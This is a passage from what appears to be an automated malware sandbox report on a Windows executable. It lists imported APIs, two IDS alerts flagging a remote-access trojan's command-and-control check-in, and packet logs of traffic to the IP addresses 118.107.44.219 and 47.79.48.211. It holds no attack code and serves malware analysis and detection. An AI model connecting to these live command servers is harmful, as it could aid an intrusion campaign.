RT_GROUP_CURSOR	0x517634	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x517648	0x22	data	English	United States	0.9411764705882353
RT_GROUP_ICON	0x51766c	0x22	data	English	United States	1.0294117647058822
RT_VERSION	0x517690	0x328	data	English	United States	0.44554455445544555
RT_MANIFEST	0x5179b8	0x60f	XML 1.0 document, ASCII text, with CRLF line terminators			0.4229529335912315
RT_MANIFEST	0x517fc8	0x298	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.4894578313253012

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, CreateDirectoryA, ExitProcess, ExitThread, CreateThread, CompareStringA, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TabbedTextOutA, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCaretPos, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, HideCaret, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetUserObjectInformationA, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetProcessWindowStation, GetParent, GetWindow, GetMessagePos, GetMessageA, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassLongA, GetClassInfoA, GetCapture, GetAsyncKeyState, GetActiveWindow, FrameRect, FindWindowExA, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExA, DrawTextW, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CopyImage, CloseClipboard, ClientToScreen, ChildWindowFromPoint, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchDIBits, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetPaletteEntries, SetEnhMetaFileBits, SetDIBitsToDevice, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, OffsetRgn, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetCurrentObject, GetClipRgn, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExtFloodFill, ExtCreateRegion, ExcludeClipRect, Ellipse, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgnIndirect, CreateRectRgn, CreatePolygonRgn, CreatePenIndirect, CreatePen, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateFontA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CombineRgn, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrlenA, lstrcpyA, lstrcmpA, WriteProcessMemory, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, UnmapViewOfFile, TryEnterCriticalSection, TerminateThread, TerminateProcess, SwitchToThread, SuspendThread, SleepEx, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetLastError, SetHandleInformation, SetFileTime, SetFilePointer, SetEvent, SetErrorMode, SetEnvironmentVariableA, SetEndOfFile, SetCurrentDirectoryA, SearchPathA, ResumeThread, ResetEvent, ReleaseMutex, ReadProcessMemory, ReadFile, QueueUserAPC, PulseEvent, PostQueuedCompletionStatus, OpenProcess, OpenMutexA, OpenFileMappingA, OpenEventA, MultiByteToWideChar, MulDiv, MoveFileA, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetWindowsDirectoryA, GetVolumeInformationA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatus, GetProcessTimes, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileType, GetFileSize, GetFileInformationByHandle, GetFileAttributesA, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryA, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FlushInstructionCache, FlushFileBuffers, FindResourceA, FindNextFileA, FindNextChangeNotification, FindFirstFileA, FindFirstChangeNotificationA, FindCloseChangeNotification, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitThread, EnumCalendarInfoA, EnterCriticalSection, DuplicateHandle, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessW, CreatePipe, CreateMutexA, CreateIoCompletionPort, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle
advapi32.dll	SetSecurityDescriptorDacl, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCreateKeyExA, RegCloseKey, InitializeSecurityDescriptor, GetUserNameA
kernel32.dll	Sleep
ole32.dll	CLSIDFromString, CoTaskMemFree, StringFromCLSID
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoTaskMemAlloc, CoCreateInstance, CoUninitialize, CoInitializeEx, CoInitialize
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
shell32.dll	Shell_NotifyIconA, ShellExecuteA, SHGetFileInfoA
shell32.dll	SHGetSpecialFolderPathA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder, SHBrowseForFolderA
comdlg32.dll	GetSaveFileNameA, GetOpenFileNameA
advapi32.dll	CreateProcessAsUserW
kernel32.dll	SwitchToThread, MapViewOfFile, VirtualQuery, VirtualAlloc, VirtualProtect, GetSystemInfo
ntdll.dll	RtlAnsiStringToUnicodeString, RtlUnicodeStringToAnsiString, RtlFreeAnsiString, NtQueryMutant, NtCreateMutant, NtWaitForSingleObject, NtTerminateProcess, NtQueryVirtualMemory, NtUnmapViewOfSection, NtOpenSection, NtCreateSection, NtQueryObject, NtClose, NtCurrentTeb, NtQuerySystemInformation
rpcrt4.dll	UuidCreate, RpcStringFreeA, UuidFromStringA, UuidToStringA
kernel32.dll	SignalObjectAndWait, InterlockedCompareExchange, FindNextFileA, FindFirstFileA, GetComputerNameExA
wsock32.dll	WSACleanup, WSAStartup, WSAGetLastError, gethostbyname, shutdown, setsockopt, ioctlsocket, inet_addr, htons, getsockname, getpeername, connect, closesocket
ws2_32.dll	WSAEnumNetworkEvents, WSAEventSelect, WSAGetOverlappedResult, WSASend, WSARecv, WSASocketA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Hebrew	Israel
Russian	Russia

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-29T11:18:25.795527+0100	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.7	49723	118.107.44.219	19091	TCP
2024-12-29T11:19:39.214553+0100	2052875	ET MALWARE Anonymous RAT CnC Checkin	1	192.168.2.7	49736	118.107.44.219	19091	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 29, 2024 11:18:10.521166086 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:10.640444040 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:10.640532017 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.001669884 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.001709938 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.001722097 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.001796961 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.001862049 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.001876116 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.001888037 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.001902103 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.001939058 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.001962900 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.002077103 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.002089977 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.002104044 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.002135992 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.002167940 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.121339083 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.121362925 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.121418953 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.218907118 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.218987942 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.219074011 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.223100901 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.223157883 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.223237038 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.231463909 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.231612921 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.231687069 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.239789963 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.239902020 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.239995956 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.248245955 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.248276949 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.248416901 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.256557941 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.256688118 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.256759882 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.264990091 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.265078068 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.265204906 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.273305893 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.273467064 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.273556948 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.281609058 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.281699896 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.281780958 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.289988041 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.290075064 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.290148973 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.298369884 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.298383951 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.301585913 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.435750961 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.435780048 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.438554049 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.438647032 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.438687086 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.439846039 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.444312096 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.446327925 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.446403027 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.446432114 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.452155113 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.452306032 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.452359915 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.457828045 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.458014965 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.458093882 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.463593006 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.463728905 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.463810921 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.469383001 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.469475031 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.469826937 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.475058079 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.475136995 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.475159883 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.480772018 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.480865955 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.480894089 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.486548901 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.486587048 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.486613035 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.492280960 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.492337942 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.492384911 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.498033047 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.498085976 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.498092890 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.503762960 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.503815889 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.503823042 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.509491920 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.509536982 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.509577036 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.515841007 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.515856028 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.516127110 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.520960093 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.521004915 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.521040916 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.526670933 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.526738882 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.652779102 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.652843952 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.652910948 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.654912949 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.655011892 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.655088902 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.659235001 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.660792112 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.660831928 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.661004066 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.665146112 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.665221930 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.665261030 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.669523001 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.669599056 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.669646978 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.673858881 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.673935890 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.673942089 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:12.673988104 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.700573921 CET	49706	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:12.819837093 CET	8853	49706	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:13.992851973 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:14.112162113 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:14.112292051 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.098112106 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:15.098170996 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:15.098242044 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:15.131872892 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:15.131900072 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:15.517343998 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.517375946 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.517391920 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.517446041 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.517575979 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.517599106 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.517611027 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.517623901 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.517640114 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.517678022 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.517815113 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.517827034 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.517838955 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.517858982 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.517894983 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.637582064 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.637634993 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.637718916 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.736299992 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.736319065 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.736402035 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.740473986 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.740520000 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.740901947 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.748827934 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.749078989 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.749196053 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.757137060 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.757396936 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.757482052 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.765499115 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.765605927 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.765759945 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.773879051 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.774019003 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.774136066 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.782669067 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.782815933 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.782860041 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.790656090 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.790683985 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.790747881 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.798979998 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.799067020 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.799141884 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.807385921 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.807404041 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.807579041 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.815732956 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.815788031 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.815980911 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.955610991 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.955676079 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.955750942 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.958403111 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.958497047 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.958619118 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.964013100 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.964098930 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.964169979 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.969774008 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.969810963 CET	8853	49707	118.107.44.219	192.168.2.7
